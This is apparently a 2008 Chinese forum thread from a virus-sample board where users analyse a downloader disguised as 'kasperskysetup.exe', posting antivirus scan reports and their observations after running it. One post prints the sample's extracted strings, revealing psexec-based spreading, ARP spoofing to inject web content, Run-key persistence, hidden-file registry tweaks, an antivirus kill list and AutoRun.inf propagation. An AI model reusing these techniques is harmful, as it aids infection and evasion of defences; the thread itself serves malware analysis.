感染EXE的DOWNLOADER,非常隐蔽!谁敢运行?

显示全部楼层 · 发表于 2008-1-30 14:38:38

有没有人试过文件感染功能?

显示全部楼层 · 发表于 2008-1-30 14:53:17

原帖由 chenrui19930 于 2008-1-30 13:59 发表
不过好象删不掉哦

延迟删除即重启后可以删除

显示全部楼层 · 发表于 2008-1-30 15:06:48

我有感染文件的毒
不过要找一下

[ 本帖最后由冷_冷于 2008-1-30 15:09 编辑 ]

显示全部楼层 · 发表于 2008-1-30 15:13:23

00423AE4: '%s\psexec.exe \\%s -u %s -p %s -c %s\servrr.exe -d',0
00423B18: 'http://tools.hxstat.com/ip/',0
00423B38: 'input name="ip"',0
00423B4C: '%s%d.%d',0
00423B54: '%s\ArpW.exe',0
00423B60: '%s\nogui.exe',0
00423B70: '%s\wpcap.dll',0
00423B80: '%s\packet.dll',0
00423B90: '%s\wanpacket.dll',0
00423BA4: '%s/arp.exe',0
00423BB0: '%s/nogui.exe',0
00423BC0: '%s/wpcap.dll',0
00423BD0: '%s/packet.dll',0
00423BE0: '%s/wanpacket.dll',0
00423BF4: '%s\ArpW.exe -idx 0 -ip %s -port 80 -insert "%s"',0
00423C24: '%s2-%s255',0
00423C30: '%s\BindF.exe',0
00423C40: '%s%d',0
00423C48: 'iphlpapi.dll',0
00423C58: 'GetTcpTable',0
00423C64: 'GetUdpTable',0
00423C70: 'SetTcpEntry',0
00423C7C: '0.0.0.0',0
00423C84: '127.0.0.1',0
00423C94: '%s\rs.bat',0
00423CA0: [email=]'@echo[/email] off',0Dh,0Ah,':start',0Dh,0Ah,'if not exist ""%1"" goto done',0Dh,0Ah,'del /F ""%1""',0Dh,0Ah,'del ""%1""',0Dh,0Ah,'goto start',0Dh,0Ah,':done',0Dh,0Ah,'del /F %temp%',0Dh,'s.bat',0Dh,0Ah,'del %temp%',0Dh,'.bat',0Dh,0Ah,0
00423D28: '%%comspec%% /c %s %s',0
00423D40: '\IME\svchost.exe',0
00423D54: '8403',0
00423D5C: 'Alerter COM+',0
00423D6C: 'Alerter COM+',0
00423D7C: 'Alerter COM+',0
00423D90: '\IME\svchost.exe',0
00423DA4: 'Alerter COM+',0
00423DB4: 'Alerter COM+',0
00423DC4: 'Alerter COM+',0
00423DD4: 'WebDown',0
00423DDC: 'Alerter COM+',0
00423DEC: 'Software\Microsoft\Windows\CurrentVersion\Run',0
00423E1C: '%s\internt.exe',0
00423E2C: '%s\progmon.exe',0
00423E3C: 'Internt',0
00423E44: 'Program file',0
00423E54: 'Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL',0
00423EA8: 'CheckedValue',0
00423EB8: '%s\%d.exe',0
00423F10: 'Process',0
00423F4C: 'Firewall',0
00423F58: 'virus',0
00423F60: 'anti',0
00423F84: 'worm',0
00423FA8: 'micropoint',0
00423FC4: 'Kaspersky',0
00423FD4: 'F-Secure',0
00423FE0: 'eScan',0
00423FE8: 'Norton',0
00423FF8: 'McAfee',0
00424000: 'Virus',0
00424008: 'Panda',0
00424018: 'Trojan',0
00424020: 'Door',0
00424034: '[AutoRun]',0Dh,0Ah,0
00424040: 'open=%s',0Dh,0Ah,0
00424064: 'shellopenCommand=%s',0Dh,0Ah,0
0042407C: 'shellopenDefault=1',0Dh,0Ah,0
004240B4: 'shell\explore\command=%s',0Dh,0Ah,0
004240D0: '\IME\svchost.exe',0
004240E4: '%c:\setup.exe',0
004240F4: '%c:\AutoRun.inf',0
00424104: 'setup.exe',0

显示全部楼层 · 发表于 2008-1-30 16:29:15

对象: kasperskysetup.exe
在压缩档案里: D:\Documents\桌面\kasperskysetup.rar
状态: 已发现病毒
病毒: Worm.Win32.AutoRun.bje (KAV 引擎)
对象: kasperskysetup.rar
路径: D:\Documents\桌面
状态: 已发现病毒
病毒: Worm.Win32.AutoRun.bje (KAV 引擎)
分析完成: 2008-1-30 16:29
已扫描 1 个文件
已发现 1 个染毒文件
发现 0 个可疑文件

显示全部楼层 · 发表于 2008-1-30 16:32:50

被小红伞杀了看来是不给我运行的机会

显示全部楼层 · 发表于 2008-1-30 18:28:47

Scanning Report
30 January 2008 18:28:02 - 18:28:07
Computer name: PUMA-PC
Scanning type: Scan target
Target: C:\Users\Administrator\Desktop\kasperskysetup.rar

--------------------------------------------------------------------------------

Result: 1 malware found
Worm.Win32.AutoRun.bje (virus)
C:\Users\Administrator\Desktop\kasperskysetup.rar\kasperskysetup.exe

--------------------------------------------------------------------------------

Statistics
Scanned:
Files: 2
Not scanned: 0
Result:
Viruses: 1
Spyware: 0
Suspicious items: 0
Riskware: 0
Actions:
Disinfected: 0
Renamed: 0
Deleted: 0
Quarantined: 0
Failed: 0
Boot Sectors:
Scanned: 0
Infected: 0
Suspicious items: 0
Disinfected: 0

--------------------------------------------------------------------------------

Options
Definitions version:
Viruses: 2008-01-30_06
Spyware: 2008-01-30_05
Scanning Engines:
F-Secure AVP: 7.00.171, 2008-01-30
F-Secure Libra: 2.04.01, 2008-01-29
F-Secure Orion: 1.02.37, 2008-01-30
F-Secure Draco: 1.00.35, 2008-01-28
Scanning options:
Scan all files
Scan inside archives
Actions:
Viruses: Delete infected files
Spyware: Delete infected files

显示全部楼层 · 发表于 2008-1-30 18:30:06

扫描报告
2008年1月30日 18:29:35 - 18:29:36
计算机名称: CN-89FF4B9EA4D6
扫描类型: 扫描目标
目标: E:\Documents and Settings\Administrator\桌面\kasperskysetup.exe

--------------------------------------------------------------------------------

结果: 找到 1 恶意软件
Worm.Win32.AutoRun.bje (病毒)
E:\Documents and Settings\Administrator\桌面\kasperskysetup.exe 操作: 已隔离

显示全部楼层 · 发表于 2008-1-30 18:32:09

也没什么

我运行了 exe未被感染只是在IME文件夹释放了个svchost 试图下载progam.exe和internt.exe 不过貌似没成功

temp里的不管是下的还是释放的都是死,除了一个自删除的BAT.

Wsyscheck 直接终止并删除进程它就嗝P了 ..

显示全部楼层 · 发表于 2008-1-30 19:02:05

瑞星病毒查杀结果报告

清除病毒种类列表：

病毒： Worm.Win32.Agent.zfm

MAC 地址：00:11:5B:F3:6D:69

用户来源：互联网

软件版本：20.29.22

[病毒样本] 感染EXE的DOWNLOADER,非常隐蔽!谁敢运行?

回复 21楼 chenrui19930 的帖子

2/1

浏览过的版块